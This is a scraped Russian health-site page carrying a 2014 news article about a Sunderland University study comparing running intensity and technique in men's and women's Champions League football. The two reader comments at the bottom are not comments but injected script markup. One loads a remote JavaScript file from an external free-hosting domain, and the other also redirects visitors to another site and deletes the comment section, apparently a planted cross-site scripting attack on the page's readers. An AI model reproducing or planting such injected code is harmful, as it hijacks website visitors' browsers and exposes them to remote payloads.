Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему никто не смотрит ж...  >>  Почему никто не смотрит женский футбол?
 
Обратная связь
 

Почему никто не смотрит женский футбол?

Размер шрифта
18 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Каждый год миллиарды людей смотрят Лигу чемпионов – престижнейший футбольный турнир. С одной лишь оговоркой – ту его разновидность, в которой играют Криштиану Роналду, Лео Месси, Уэйн Руни и другие игроки – сюрприз! – мужского пола. Женский футбол зрителей интересует примерно в той же степени, что и соревнования по нардам среди пенсионеров. Отчего такая несправедливость? Ученые из Англии решили разобраться.

Почему никто не смотрит женский футбол?

Исследование проводилось силами Сандерлендского университета на северо-востоке Англии. Авторы решили изучить с технической точки зрения, в чем состоит разница между мужским и женским футболом.

Ученые проанализировали физические характеристики 54 и 59 футболистов мужского и женского пола соответственно. Все они принимали участие в Лиге Чемпионов УЕФА.

Выяснилось, что суммарное расстояние, пробегаемое игроками за матч, не слишком-то отличается у футболистов обоих полов – мужчины опередили прекрасных дам лишь на йоту (конкретнее – на 3-5%). Тем не менее, колоссальная разница выявилась в интенсивности игры: оказалось, что футболисты-мужчины бегают в резком темпе на 30% больше, чем женщины.

Кроме того, исследование показали, что футболистки значительно сбавляют в темпе во втором тайме, тогда как спортсмены от сильной половины человечества более-менее сохраняют баланс физической активности на протяжении всей игры.

Любопытно, что нападающие и центральные защитники продемонстрировали сопоставимые показатели эффективности, тогда как «полузащитницы» серьезно отстали от своих тестостероновых коллег.

Наконец, ученые выяснили, что женщины в футболе чаще теряют мячи, зато реже дают неточный пас.

«Совершенно очевидно, что мужской и женский профессиональный футбол – совершенно разные игры с физической и технической точек зрения», – рассказывает доктор Пол Брэдли, старший лектор кафедры спортивной медицины Сандерлендского университета. «Физиологически женщины менее выносливы, чем мужчины; это во многом объясняет колоссальную наблюдаемую разницу в динамике игры».

Авторы надеются, что их работа позволит создать новые тренировочные методики для футболисток, с помощью которых удастся повысить качество игры и, как следствие, увеличить популярность этой игры.

Мы же со своей стороны воспользуемся моментом и выразим уважение и почет девушкам, которые посвящают себя такому трудному виду спорта. Вы молодцы, вне зависимости от процента точных передач!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Куда отправить мужа, если он мешает вам спать?   Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   Как Анджелина Джоли изменила наш мир?   Ученые выяснили, какое движение сделает вашего мужчину жеребцом  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Какие ошибки не дадут вам похудеть в Новом году
Что нельзя делать перед сном
Как не впасть в депрессию после хорошего отдыха

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.